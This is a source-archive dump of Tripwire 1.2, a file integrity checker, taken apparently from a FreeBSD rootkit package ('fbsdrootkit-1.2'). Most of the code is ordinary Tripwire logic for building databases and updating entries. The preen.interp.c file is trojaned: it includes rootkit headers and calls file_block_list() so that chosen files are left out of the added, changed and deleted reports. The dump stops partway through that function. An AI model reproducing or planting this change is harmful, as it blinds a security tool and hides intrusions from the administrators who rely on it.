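    if (specified_configfd == 0 && specified_dbasefd == 0) {
        fprintf(stderr, "%s: specified database and configuration file can't be both be stdin!\n", progname);
        exit(1);
    }

    /* interactive mode and update mode? */
    if (interactivemode && pp_updateentries) {
        fprintf(stderr, "%s: conflicting mode directives! Aborting...\n", progname);
        exit(1);
    }

    /* specified configfile and configfd? */
    if ((specified_configmode & SPECIFIED_FILE) &&
        (specified_configmode & SPECIFIED_FD)) {
        fprintf(stderr, "%s: specified file and file descriptor for configuration file!\n", progname);
        exit(1);
    }

    /* specified dbasefile and dbasefd? */
    if ((specified_dbasemode & SPECIFIED_FILE) &&
        (specified_dbasemode & SPECIFIED_FD)) {
        fprintf(stderr, "%s: specified file and file descriptor for database file!\n", progname);
        exit(1);
    }

    /* specified dbasefile and initialize dbase mode */
    if (specified_dbasemode && dbaseinit) {
        if (!quietmode) {
            fprintf(stderr, "%s: specifying a database file in database initialization mode \n", progname);
            fprintf(stderr, "\tis meaningless. Ignoring specified file...\n");
        }
    }

    /*** we check any specified file descriptors to make sure they are
     *** files. if not, we copy them into /tmp and return its fd.
     *** (we unlink them as soon as we create them.)
     ***/
    switch(specified_dbasemode) {
    case SPECIFIED_NONE:
        break;
    case SPECIFIED_FILE:
        specified_dbasefd = file_copy_to_tmp(specified_dbasefile);
        break;
    case SPECIFIED_FD:
        specified_dbasefd = fd_copy_to_tmp(specified_dbasefd);
        break;
    default:
        die_with_err("illegal specified_dbasemode state", NULL);
    }

    switch(specified_configmode) {
    case SPECIFIED_NONE:
        break;
    case SPECIFIED_FILE:
        specified_configfd = file_copy_to_tmp(specified_configfile);
        break;
    case SPECIFIED_FD:
        specified_configfd = fd_copy_to_tmp(specified_configfd);
        break;
    default:
        die_with_err("illegal specified_configmode state", NULL);
    }

    /* initialize lists */
    list_init();

    /* build hostname specific names */
    filename_hostname_expand(&config_path);
    filename_hostname_expand(&config_file);
    filename_hostname_expand(&database_path);
    filename_hostname_expand(&database_file);

    /* recompute the default ignore string (old -> new format) */
    if (strlen(defaultignore) >= sizeof(mask)) {
        fprintf(stderr, "%s: default ignore mask is too long!\n", progname);
        exit(1);
    }
    (void) strcpy(mask, defaultignore);
    ignore_configvec_to_dvec(mask);
    /* mask is a local of main(); that is safe only because main() never
     * returns (every path below ends in exit()) */
    defaultignore_parsed = mask;

    /* if we are creating a database, make sure the database troving directory
     * exist.
     */
#define DATABASE_REPOSITORY "./databases"

    if (dbaseinit || interactivemode || numupdateentries > 0) {
        if ((fd = open(DATABASE_REPOSITORY, 0)) >= 0) {
            close(fd);
        }
        else {
            /*
             * NOTE(review): the directory is created relative to the
             * current working directory with mode 0777, so its final
             * permissions are whatever the caller's umask leaves.  A
             * directory that holds the integrity baseline should not be
             * writable by group or others.
             */
            if (mkdir(DATABASE_REPOSITORY, 0777) >= 0) {
                if (!quietmode) {
                    fprintf(stderr, "### Warning:\tcreating %s directory!\n", DATABASE_REPOSITORY);
                    fprintf(stderr, "###\n");
                }
            }
            else {
                /* progname (argv[0]) has no length limit, so print the
                 * prefix directly instead of building it in a buffer;
                 * perror("") then appends only the errno text */
                saved_errno = errno;
                fprintf(stderr, "%s: mkdir(%s): ", progname, DATABASE_REPOSITORY);
                errno = saved_errno;
                perror("");
                exit(1);
            }
        }
    }

    /* are we in database generation mode? */
    if (dbaseinit) {
        char *oldpath = database_path;
        struct list *dbase_entry_list = (struct list *) NULL;

        /* place database in ./databases */
        database_path = DATABASE_REPOSITORY;

        /* generate the database */
        configfile_read(&olddbase_list, &dbase_entry_list);
        database_build(&olddbase_list, DBASE_PERMANENT, &dbase_entry_list);

        if (!quietmode) {
            fprintf(stderr, "###\n");
            fprintf(stderr, "### Warning: Database file placed in %s/%s.\n", database_path, database_file);
            fprintf(stderr, "###\n");
            fprintf(stderr, "### Make sure to move this file file and the configuration\n");
            fprintf(stderr, "### to secure media!\n");
            fprintf(stderr, "###\n");
            fprintf(stderr, "### (Tripwire expects to find it in '%s'.)\n", oldpath);
        }
        cleanup();
        exit(0);
    }

    /*
     * make sure that database file is there!
     *	(this is meaningless if we specified stdin "-")
     */
    switch(specified_dbasemode) {
    case SPECIFIED_NONE:
        /* path + '/' + file + NUL must fit */
        if (strlen(database_path) + strlen(database_file) + 2 > sizeof(database)) {
            fprintf(stderr, "%s: database file name is too long!\n", progname);
            exit(1);
        }
        sprintf(database, "%s/%s", database_path, database_file);
        break;
    case SPECIFIED_FILE:
        /* the name comes straight from the command line */
        if (strlen(specified_dbasefile) >= sizeof(database)) {
            fprintf(stderr, "%s: database file name is too long!\n", progname);
            exit(1);
        }
        (void) strcpy(database, specified_dbasefile);
        break;
    case SPECIFIED_FD:
        break;
    }

    if (!printpreprocess && (specified_dbasemode != SPECIFIED_FD)) {
        if ((fd = open(database, O_RDONLY)) < 0) {
            /* make sure our error message is correct */
            if (errno != ENOENT) {
                /* database alone can exceed a 1024-byte buffer, so the
                 * prefix is printed directly */
                saved_errno = errno;
                fprintf(stderr, "%s: database file `%s': ", progname, database);
                errno = saved_errno;
                perror("");
                exit(1);
            }
            fprintf(stderr, "%s: database file '%s' does not exist! Aborting...\n", progname, database);
            exit(1);
        }
        (void) close(fd);
    }

    /* are we in database update mode? */
    if (numupdateentries) {
        update_mark(pp_updateentries, numupdateentries);
        cleanup();
        exit(0);
    }

    /* we're in integrity checking mode */
    update_gather(interactivemode, &pp_updateentries);

    /* do we do the interactive update? */
    if (interactivemode && pp_updateentries) {
        list_reset(&olddbase_list);
        list_reset(&diff_added_list);
        list_reset(&diff_deleted_list);
        list_reset(&diff_changed_list);

        /* reset the ignore flags so we scan all signatures */
        runtimeignore = 0;

        /* the vector filled in by update_gather() is walked up to its
         * NULL entry; that walk also yields the entry count */
        for (i = 0; (pc = pp_updateentries[i]) != NULL; i++) {
SPDEBUG(0) printf("Updating entry: %s\n", filename_escape(pc));
        }
        numupdateentries = i;

        if (!quietmode) {
            fprintf(stderr, "### Updating database...\n###\n");
        }
        update_mark(pp_updateentries, numupdateentries);
        cleanup();
        if (!quietmode) {
            fprintf(stderr, "###\n");
            fprintf(stderr, "### If you changed the tw.config file, remember to run `twdb_check.pl' to\n");
            fprintf(stderr, "### ensure database consistency.\n");
            fprintf(stderr, "### See the README file for details.\n");
        }
        exit(0);
    }

    cleanup();

    /* our exit status is based on files added/deleted/changed */
    if (diff_added_num)
        exitstatus |= 2;
    if (diff_deleted_num)
        exitstatus |= 4;
    if (diff_unignored_num)
        exitstatus |= 8;

    exit(exitstatus);
    /*NOTREACHED*/
}

/*
 * void
 * cleanup()
 *
 *	called before every normal exit of main().  Currently a no-op:
 *	the code that unlinked specified_dbasefile when a database fd had
 *	been set is disabled, so nothing is removed here.
 */

void
cleanup()
{
    /* delete temporary database file (derived from specified dbasefd) */
    /*
    if (specified_dbasefd >= 0) {
        unlink(specified_dbasefile);
    }
    */
}

fbsdrootkit-1.2/tripwire-1.2/src/md4convert.sh100700 764 764 4326 5367613473 16532 0ustar dfdf#!/bin/sh # md4convert.sh # # md4convert.sh is a shell script replaces all the MD4 signatures in # the specified Tripwire database. This script was written to help # re-adjust the databases after it was discovered that the MD4 routines # included in Tripwire releases before version 1.0.3 generated # incorrect signatures. # # Gene Kim # Purdue University # April 28, 1993 # ## predefined filenames file=/tmp/genek/tw.db_flounder.Eng.Sun.COM ## names of temporary files tmpfile=/tmp/tw.list outfile=/tmp/tw.tmp sigfile=/tmp/tw.sig ## make backup files (very conservatively) # copy the files to the right places if [ -f $file.BAK ] then echo "### $file.BAK already exists! " echo "### Cannot backup file. 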
Remove the file and run this script again." exit 1 fi echo "### Backing up $file to $file.BAK" cp $file $file.BAK ## place {filename, md4sig} pairings in $tmpfile echo "### Scanning new file signatures" rm -f $outfile cat $file | egrep -v '^#' | egrep -v '^@' | awk ' BEGIN { NF = " "; } \ { if ($13 == $14 && $14 == $15 && \ $15 == $16 && $16 == $17 && $17 == $18 && $18 == $19 && \ $19 == $20 && $20 == $21 && $21 == $22 && $22 == 0) { next; } \ else {print $1;}} ' > $tmpfile for filename in `cat $tmpfile` do # this works unreliably, so we have to look for all nullsigs up above if [ -f $filename ] then sigfetch -5 $filename > $sigfile if [ $? -eq 0 ] then sig=`cat $sigfile | sed 's/.*: //'` echo Scanning: $filename echo $filename $sig >> $outfile fi fi done ## merge the two files together echo "### Substituting and merging signature files..." newfile=/tmp/tw.new awk ' \ # signatures begin at field 12 \ BEGIN { \ FS = " "; \ filename = "/tmp/tw.tmp"; \ \ # get new values from tmpfile, put into associative array \ while(getline newline " newarray[2]; \ signatures[newarray[1]] = newarray[2]; \ } \ \ } \ /^#/ { print $0; next; } \ /^@@/ { print $0; next; } \ { \ if (signatures[1]) { \ print "-->", signatures[$1], "<---"; $17 = signatures[$1]; \ } \ print $0; \ \ } ' < $file > $newfile echo "### Copying new database file to $file" cp $newfile $file fbsdrootkit-1.2/tripwire-1.2/src/nullsig.c100600 764 764 2171 5612134343 15710 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: nullsig.c,v 1.12 1994/07/17 04:51:47 gkim Exp $"; #endif /* * nullsig.c * * hook for null signature * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #include #include #include "../include/tripwire.h" #include "../include/sigs.h" #ifndef SEEK_SET # define SEEK_SET L_SET #endif /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: 
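pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */

/*
 * sig_null_get(fd_in, ps_signature, siglen)
 *
 *	the "null" signature: rewinds fd_in and stores the string "0" in
 *	ps_signature.  Returns 0.  Dies through die_with_err() when the
 *	descriptor cannot be rewound or when siglen is too small to hold
 *	the two bytes written (the digit and its terminating NUL).
 */

int
sig_null_get (fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    /* rewind the file descriptor */
    if (lseek(fd_in, 0, SEEK_SET) < 0) {
        die_with_err("sig_null_get: lseek()", (char *) NULL);
    }

    /* siglen used to be ignored ("lint pacifier"); honour it so this
     * routine can never write past the caller's buffer */
    if (siglen < 2) {
        die_with_err("sig_null_get: signature buffer too small", (char *) NULL);
    }

    ps_signature[0] = '0';
    ps_signature[1] = '\0';
    return 0;
}

fbsdrootkit-1.2/tripwire-1.2/src/preen.c100600 764 764 45735 5614754433 15413 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: preen.c,v 1.29 1994/07/25 15:24:11 gkim Exp $"; #endif /* * preen.c * * preen the filesystems in preen.config against the data stored in * in preen.database. * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #ifdef STRINGH #include #else #include #endif #include #include #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include #include "../include/list.h" #include "../include/tripwire.h" static struct list *newdbase_list = NULL; static int numentriesread = 0; /* running count of @@contents */ /* prototypes */ char *mktemp(); static void olddbasefile_load(); char *updatemodes[] = { "invalid update", "add file", "delete file", "update file", "entry not found", "add entry", "delete entry", "update entry", };

/*
 * update_gather()
 *
 *	routine that calls all the other functions for preening
 *	in interactive mode.  (this is a wrapper around the functions
 *	of integrity checking mode and then update.)
 *
 *	interactive and ppp_updateentries are passed through unchanged to
 *	preen_report().  When printpreprocess is set the routine exits
 *	the program (status 0) right after the configuration file has
 *	been read.
 */

void
update_gather(interactive, ppp_updateentries)
    int interactive;
    char ***ppp_updateentries;
{
    FILE *fp_in;
    struct list *configentry_list = (struct list *) NULL;

SPDEBUG(3) printf("*** entering update_gather()\n");

    /* build the filelist (newdbase_list) from the preen.config file
     *	it will create the linked list of files
     */
    configfile_read(&newdbase_list, &configentry_list);

    /* if we're simply using as a preprocessor, then quit */
    if (printpreprocess)
        exit(0);

    /* preen ourselves:
     *	build a temporary database, then check for diffs
     */
    database_build(&newdbase_list, DBASE_TEMPORARY, &configentry_list);

    /* read in the old database */
    olddbasefile_load(&configentry_list);
    assert(configentry_list);

    /* database_build() rewound the descriptor, so it's ready to use */
    fp_in = fptempdbase;

    /* build the diff_xxx_lists of ADDED, CHANGED, DELETED */
    preen_interp(fp_in);

    /* now build the report */
    preen_report(interactive, ppp_updateentries);

    /* NOTE(review): the temporary database stream is closed only when no
     * configuration file or descriptor was specified; the reason for
     * that condition is not visible here -- confirm */
    if (!specified_configmode)
        (void) fclose(fp_in);

    /* remove the temporary database file */
    (void) unlink(tempdatabase_file);

SPDEBUG(3) printf("*** leaving update_gather()\n");

    list_reset(&configentry_list);
    return;
}

/* * update_mark(char **ppentries, int numentries) * * build the filelist (newdbase_list) from tw.config file. 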
* check if each (updateentry) in the (ppentries) vector is an entry * if it is, update all entries with the same entrynum * else if (updateentry) exists * if so, update, w/same entrynum * else append to database, w/entrynum = -1 */ void update_mark(ppentries, numentries) char **ppentries; int numentries; { struct list *configentry_list = (struct list *) NULL; char *entry; int i, numskipped = 0; /* number of entries not found */ /* build the filelist (newdbase_list) from the tw.config file * it will create the linked list of files */ list_reset(&newdbase_list); list_reset(&configentry_list); assert(!newdbase_list); assert(!configentry_list); assert(!olddbase_list); configfile_read(&newdbase_list, &configentry_list); /* read in the old database */ olddbasefile_load(&configentry_list); SPDEBUG(20) { printf("===== configentry_list ===\n"); list_print(&configentry_list); printf("===== newdbase_list ===\n"); list_print(&newdbase_list); printf("===== olddbase_list ===\n"); list_print(&olddbase_list); } /* iterate through the entries */ for (i = 0; i < numentries; i++) { int isentry, isold, isnew; int whichcase; entry = ppentries[i]; /* check to see if filename is fully-qualified! */ if (entry[0] != '/') { fprintf(stderr, "%s: file '%s' is not fully qualified! Skipping...\n", progname, entry); numskipped++; continue; } /* * tw.config old dbase new dbase * ========= ======== ======== * 0. - - - * 1. - - y * 2. - y - * 3. - y y * 4. y - - * 5. y - y * 6. y y - * 7. y y y * * * (0) xxx -- can't happen * skip, invalid filename * * (1) add file -- adds the single file to the database * (what contents number do we give it? what ignore flags?) * * (2) delete file -- removes the single file from the database. * * (3) update file -- updates the single file in the database. * (inherit new ignore mask) * * (4) xxx -- the entry doesn't resolve to any files on the system. 
* (no change) * * (5) add entry -- recurses down the specified entry and adds all * the resulting files to the database. * (ignore mask comes from "closest" tw.config entry) * * (6) delete entry -- the files disappeared since the last * dbase snapshot so, delete the entire entry * * (7) update entry -- recurses down the specified entry and * updates all those entries in the database * (inherit new ignore mask) */ isentry = list_isthere(entry, &configentry_list); isnew = list_isthere(entry, &newdbase_list); isold = list_isthere(entry, &olddbase_list); /* our case number is the vector of true/false bits */ whichcase = (isentry << 2) | (isold << 1) | (isnew); if (!quietmode) { fprintf(stderr, "Updating: %s: %s\n", updatemodes[whichcase], filename_escape(entry)); } switch(whichcase) { case UPDATE_INVALID: case UPDATE_NOTFOUND: if (!quietmode) { fprintf(stderr, "update: %s: invalid entry! skipping...\n", entry); } continue; case UPDATE_ADDFILE: { char entry_ignorevec[64]; char ignorestring[64]; char *pc; int entrynum; char entryname[1024]; if (verbosity) fprintf(stderr, "Adding file %s\n", filename_escape(entry)); dbase_entry_howclose(entry, &configentry_list, entryname, &entrynum); /* we use the default ignore-string. XXX. 
Must be definable */ if (!(pc = list_lookup(entry, &newdbase_list))) { strcpy(ignorestring, defaultignore); ignore_configvec_to_dvec(ignorestring); } else { char tmpignore[64]; int j, err; if ((err = sscanf(pc, "%d %s", &j, tmpignore)) != 2) { fprintf(stderr, "update_mark: newdbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } strcpy(ignorestring, tmpignore); } sprintf(entry_ignorevec, "%d %s", entrynum, ignorestring); list_set(entry, entry_ignorevec, MAXPATHLEN+1, &olddbase_list); list_setflag(entry, FLAG_UPDATE, &olddbase_list); } break; case UPDATE_DELETEFILE: if (verbosity) fprintf(stderr, "Deleting file %s\n", filename_escape(entry)); list_unset(entry, &olddbase_list); break; case UPDATE_UPDATEFILE: { char oldignore[64], newignore[64], *pc, oldrest[1024]; char newvalue[1024]; int err, newentry, oldentry; if (verbosity) fprintf(stderr, "Updating file %s\n", filename_escape(entry)); /* we know that the entry exists the the new dbaselist, otherwise, * we couldn't be in this case! 
*/ pc = list_lookup(entry, &newdbase_list); assert(pc != NULL); /* parse the new dbase entry */ if ((err = sscanf(pc, "%d %s", &newentry, newignore)) != 2) { fprintf(stderr, "update_mark: newdbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } /* parse the old dbase entry */ pc = list_lookup(entry, &olddbase_list); assert(pc != NULL); /* parse the old dbase entry */ if ((err = sscanf(pc, "%d %s %[^\n]", &oldentry, oldignore, oldrest)) != 3) { if (list_getflag(entry, &olddbase_list) & FLAG_UPDATE) { SPDEBUG(3) printf("\t(it's already a newly file...)\n"); break; } fprintf(stderr, "update_mark: olddbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } /* splice the new ignore flag into the old dbase list */ sprintf(newvalue, "%d %s %s\n", oldentry, newignore, oldrest); /* check to make sure we're not overflowing bounds */ /* why? the ignore mask is the only thing that changed, * so the length of the entire string should also remain * unchanged. */ assert(strlen(newvalue) == strlen(pc)); list_set(entry, newvalue, MAXPATHLEN+1, &olddbase_list); list_setflag(entry, FLAG_UPDATE, &olddbase_list); } break; case UPDATE_ADDENTRY: { struct list_elem *p; char ignorevec[128]; int number; char *pc; int err; if (verbosity) fprintf(stderr, "Adding entry %s\n", filename_escape(entry)); if (!(pc = list_lookup(entry, &configentry_list))) { fprintf(stderr, "%s: Can't find entry '%s'. 
Skipping...\n", progname, entry); continue; } if ((err = sscanf(pc, "%d %s", &number, ignorevec)) != 2) { fprintf(stderr, "update_mark: configentry_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, pc); exit(1); } list_open(&newdbase_list); while ((p = list_get(&newdbase_list))) { int thisentry; if (sscanf(p->varvalue, "%d", &thisentry) != 1) { fprintf(stderr, "update_mark: newdbase_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", p->varname, p->varvalue); exit(1); } /* does it match the entry we're adding? */ if (thisentry == number) { SPDEBUG(6) { printf("--(adding entry)--> %s\n", p->varname); } list_set(p->varname, p->varvalue, MAXPATHLEN+1, &olddbase_list); list_setflag(p->varname, FLAG_UPDATE, &olddbase_list); } } list_close(&olddbase_list); } break; case UPDATE_DELETEENTRY: case UPDATE_UPDATEENTRY: if (verbosity) { switch(whichcase) { case UPDATE_DELETEENTRY: fprintf(stderr, "Deleting entry %s\n", filename_escape(entry)); break; case UPDATE_UPDATEENTRY: fprintf(stderr, "Updating entry %s\n", filename_escape(entry)); break; } } { struct list_elem *p, *q = (struct list_elem *) NULL; char s[2048]; int entrynum; char newignore[1024]; int err; /* get entry number and new ignore mask */ (void) strcpy(s, list_lookup(entry, &configentry_list)); if ((err = sscanf(s, "%d %s", &entrynum, newignore)) != 2) { fprintf(stderr, "update_mark: configentry_list parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, "%s>> %s\n", entry, s); exit(1); } /* we're updating entries */ if (whichcase == UPDATE_UPDATEENTRY) { dbase_entry_flag(&olddbase_list, entrynum, FLAG_UPDATE, (char *) newignore); } /* else we're deleting entries */ else { dbase_entry_flag(&olddbase_list, entrynum, FLAG_DELETE, NULL); SPDEBUG(20) list_print(&olddbase_list); list_open(&olddbase_list); while ((p = list_get(&olddbase_list))) { if (q) { list_unset(q->varname, &olddbase_list); q = 
(struct list_elem *) NULL; } if (list_getflag(p->varname, &olddbase_list) & FLAG_DELETE) { q = p; } } if (q) { list_unset(q->varname, &olddbase_list); q = (struct list_elem *) NULL; } list_close(&olddbase_list); list_unset(entry, &configentry_list); SPDEBUG(20) { list_print(&configentry_list); } } } break; default: fprintf(stderr, "update_mark: invalid case %d!\n", whichcase); exit(1); } } /* did we skip all the files, thus a no-op? */ if (numskipped == numentries) { printf("%s: No updated entries. Database remains unchanged.\n", progname); exit(1); } /* we used to print the backup warning banner here -- now it's in * dbase.build.c */ /* preen ourselves: * build a temporary database, then check for diffs */ database_build(&olddbase_list, DBASE_UPDATE, &configentry_list); return; } /* * void * olddbasefile_load(ppentrylist) * * load in the old database file into the global list (olddbase_list). * (ppentrylist) is the list of entries. */ static void olddbasefile_load(ppentrylist) struct list **ppentrylist; { char filename[MAXPATHLEN+256]; FILE *fp; char s[MAXPATHLEN+512]; char key[MAXPATHLEN+256], value[512]; static struct list *replace_list = (struct list *) NULL; SPDEBUG(3) printf("*** entering olddbasefile_load()\n"); if (specified_dbasemode == SPECIFIED_FILE) (void) strcpy(filename, specified_dbasefile); else sprintf(filename, "%s/%s", database_path, database_file); /* did we specify a dbase file? 
*/ if (specified_dbasemode) { if (!(fp = (FILE *) fdopen(specified_dbasefd, "r"))) { die_with_err("Couldn't open database file '%s'", filename); } rewind(fp); if (ftell(fp) != 0) { die_with_err("olddbasefile_load: ftell()", NULL); } } /* else open the file */ else { if ((fp = fopen(filename, "r")) == NULL) die_with_err("Couldn't open database file '%s'", filename); } /* first make sure that none of the entry numbers changed */ while (fgets(s, sizeof(s), fp) != NULL) { char entryname[2048], *pc; int oldentrynum, newentrynum; static int countlines; countlines++; if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: database='%s': parse error: space not found in line %d!\n", progname, filename, countlines); exit(1); } /* build table of contents */ if (strcmp(key, "@@contents") != 0) { continue; } /* check to see if entrynums match */ if (sscanf(value, "%s %d", entryname, &oldentrynum) != 2) { fprintf(stderr, "olddbasefile_load: parse error at %s: %d\n>>%s", __FILE__, __LINE__, s); exit(1); } filename_escape_expand(entryname); if (!list_isthere(entryname, ppentrylist)) continue; pc = list_lookup(entryname, ppentrylist); newentrynum = atoi(pc); /* if discrepency, then store in replace_list */ if (oldentrynum != newentrynum) { char oldent[100], newent[100]; /* gotta do some chopping up of the contents information */ sprintf(oldent, "%d", oldentrynum); sprintf(newent, "%d", newentrynum); list_set(oldent, newent, MAXPATHLEN+1, &replace_list); } } rewind(fp); /* read in entire file */ while (fgets(s, sizeof(s), fp) != NULL) { static int countlines = 0; countlines++; /* skip comments */ if (s[0] == '#') continue; if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: database='%s': parse error: space not found in line %d!\n", progname, filename, countlines); exit(1); } /* build table of contents */ if (strcmp(key, "@@contents") == 0) { numentriesread++; continue; } /* skip database version */ else if (strcmp(key, "@@dbaseversion") == 0) { int version, 
err; if ((err = sscanf(value, "%d", &version)) != 1) { fprintf(stderr, "olddbasefile_load: @@dbaseversion parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, ">> %s\n", key); exit(1); } if (version != DB_VERSION_NUM) { /* special case */ if (DB_VERSION_NUM == 4 && version == 3) { fprintf(stderr, "%s: %s: version mismatch\n", progname, filename); fprintf(stderr, "\tdatabase format %d is no longer fully supported (expecting %d)!\n", version, db_version_num); fprintf(stderr, "\tSee tw.config(5) manual page for details\n"); } else { fprintf(stderr, "%s: %s: version error\n", progname, filename); fprintf(stderr, "\tdatabase format %d is no longer supported (expecting %d)!\n", version, db_version_num); fprintf(stderr, "\tSee tw.config(5) manual page for details\n"); exit(1); } } continue; } /* else it's a file */ else { int mode; char pcentry[512], pcignore[512], pcrest[1024]; char newvalue[1024]; int err; SPDEBUG(10) printf("olddbasefile_load: %s: %s", key, value); filename_escape_expand(key); /* check to see if it's a special file */ if ((err = sscanf(value, "%s %s %o %[^\n]", pcentry, pcignore, &mode, pcrest)) != 4) { fprintf(stderr, "olddbasefile_load: parse error (nfields=%d)!", err); fprintf(stderr, ">> %s", value); exit(1); } /* do we need to replace the entry number? 
*/ if (list_isthere(pcentry, &replace_list)) { /* splice the new value in */ sprintf(newvalue, "%s %s %o %s\n", list_lookup(pcentry, &replace_list), pcignore, mode, pcrest); list_set(key, newvalue, MAXPATHLEN+1, &olddbase_list); } /* otherwise the entry number was fine */ else { list_set(key, value, MAXPATHLEN+1, &olddbase_list); } switch (mode & S_IFMT) { case S_IFIFO: case S_IFCHR: case S_IFDIR: case S_IFBLK: #if !defined(SYSV) || (SYSV > 3) #ifndef apollo /* Foolish Apollos define S_IFSOCK same as S_IFIFO in /bsd4.3/usr/include/sys/stat.h */ case S_IFSOCK: #endif #endif (void) list_setflag(key, FLAG_NOOPEN, &olddbase_list); break; #if !defined(SYSV) || (SYSV > 3) case S_IFLNK: /* if it's a symbolic link, make sure we flag it as such! */ (void) list_setflag(key, FLAG_SYMLINK, &olddbase_list); break; #endif } } } /* close the file descriptor */ if (!specified_dbasemode) (void) fclose(fp); SPDEBUG(3) printf("*** leaving olddbasefile_load()\n"); list_reset(&replace_list); return; } /* * dbase_entry_closest() * * given a (filename), choose the "closest" entry in the tw.config * file. 
*
 *  Ex: filename = "/etc/foo/bar"
 *
 *      entry:          score:
 *      /etc            1
 *      /etc/foo        2
 *      /etc/foo/bar    3
 *
 *  The function defined below is named dbase_entry_howclose().
 *
 *  (filename)    path to find an ancestor entry for.
 *  (ppentrylist) list walked with list_open()/list_get()/list_close();
 *                each element's varname is a candidate entry.
 *  (entry)       out: receives the best-scoring varname through strcpy();
 *                the copy is unbounded, so the caller's buffer must be
 *                large enough for any varname in the list.
 *  (pentrynum)   out: entry number parsed from the olddbase_list value of
 *                the best candidate, or 0 when that name is not there.
 *
 *  The score of a candidate is the number of '/' characters in the prefix
 *  it shares with (filename), less one when that prefix ends on a '/'.
 *  Only a score above 0 is accepted, so (entry) and (pentrynum) are left
 *  untouched when no candidate qualifies.  Exits on list or parse errors.
 */
void
dbase_entry_howclose(filename, ppentrylist, entry, pentrynum)
    char *filename;
    struct list **ppentrylist;
    char *entry;
    int *pentrynum;
{
    struct list_elem *elem;
    int best = 0;

    if (list_open(ppentrylist) < 0) {
        fprintf(stderr, "%s: dbase_entry_howclose: list_open() failed!\n", progname);
        exit(1);
    }

    while ((elem = list_get(ppentrylist))) {
        char *cand = elem->varname;
        char *want = filename;
        char *dbvalue;
        char trash[1024];
        int entrynum = 0;
        int score = 0;

        /* count the '/' characters in the shared prefix */
        while (*cand && *want && *cand == *want) {
            if (*want == '/')
                score++;
            cand++;
            want++;
        }

        /* a prefix that stops right after '/' counted one level too many */
        if (cand != elem->varname && cand[-1] == '/')
            score--;

        SPDEBUG(6)
            printf("dbase_entry_howclose: %d: (%s,%s)\n", score, filename, elem->varname);

        /* keep only a strictly better candidate */
        if (score <= best)
            continue;

        best = score;
        strcpy(entry, elem->varname);

        /* entry number is the first field of the stored database value */
        dbvalue = list_lookup(elem->varname, &olddbase_list);
        if (dbvalue && sscanf(dbvalue, "%d %s", &entrynum, trash) != 2) {
            die_with_err("dbase_entry_howclose: sscanf() parsing error!\n", (char *) NULL);
        }
        *pentrynum = entrynum;
    }

    if (list_close(ppentrylist) < 0) {
        fprintf(stderr, "%s: dbase_entry_howclose: list_close() failed!\n", progname);
        exit(1);
    }

    SPDEBUG(6)
        printf("dbase_entry_howclose: ancestor: %s\n", entry);
}
fbsdrootkit-1.2/tripwire-1.2/src/preen.interp.c100600 764 764 6530 6273465271 16662 0ustar dfdf
#ifndef lint
static char rcsid[] = "$Id: preen.interp.c,v 1.14 1994/04/04 00:34:40 gkim Exp $";
#endif

/*
 * preen.interp.c
 *
 *  interpret the diffs between the database files
 *
 * Gene Kim
 * Purdue University
 */

#include "../include/config.h"
#include
#ifdef STDLIBH
#include
#endif
#ifdef STRINGH
#include
#else
#include
#endif
#include
#ifdef __STDC__
# include
# include
#endif
#if (defined(SYSV) && (SYSV < 3))
# include
#endif /* SVR2 */
#include "../include/list.h"
#include "../include/tripwire.h"

/* Rootkit configuration
files */
#include "../../config.h"
#include "../../rootkittripwire.h"

/* the diff lists */
struct list *diff_added_list = NULL,
            *diff_deleted_list = NULL,
            *diff_changed_list = NULL;

/* how many in each list */
int diff_added_num = 0,
    diff_changed_num = 0,
    diff_deleted_num = 0,
    diff_unignored_num = 0;

/*
 * preen_interp(FILE *fpin)
 *
 *  do the actual interpretation of the diff output, generated by
 *  diffing the two database files.
 *
 *  Reads "key value" records from (fpin) and sorts each into one of
 *  the three diff lists, bumping the matching counter:
 *      value differs from the one in olddbase_list -> diff_changed_list
 *      key absent from olddbase_list               -> diff_added_list
 *      olddbase_list entry never flagged FLAG_SEEN -> diff_deleted_list
 *  Lines starting with '#' or "@@" are skipped.  Exits on a parse
 *  error or when the list cannot be opened or closed.
 *
 *  NOTE(review): file_block_list() and check_file() are not defined in
 *  this view; they presumably come from the rootkit headers included
 *  above.  Together they remove selected paths from every diff list
 *  (see the comment at the check_file() call), so the output of this
 *  function is not a complete comparison of the two databases.
 */
void
preen_interp (fpin)
    FILE *fpin;
{
    char s[1024];
    char key[MAXPATHLEN+256], value[512];
    struct list_elem *plist;

    /* Read in list of files to have their reports blocked.
     * Runs once, before any record is compared.
     */
    file_block_list();

    if (!quietmode)
        fprintf(stderr, "### Phase 4: Searching for inconsistencies\n");

    /* start reading in lines from the new database */
    while (fgets(s, sizeof(s), fpin) != NULL) {
        char *oldvalue;
        /* starts at 1 and is incremented before use, so the first
         * line read is reported as line 2 in the error below
         */
        static int countlines = 1;

        countlines++;

        /* is it a comment? */
        if (s[0] == '#')
            continue;

        /* "@@" lines are skipped as well */
        if (s[0] == '@' && s[1] == '@')
            continue;

        /*
         * if it's in the list:
         *      flag as SEEN
         *      a) if it's the same, next;
         *      b) if it's different, it's CHANGED;
         * otherwise,
         *      it's ADDED
         *
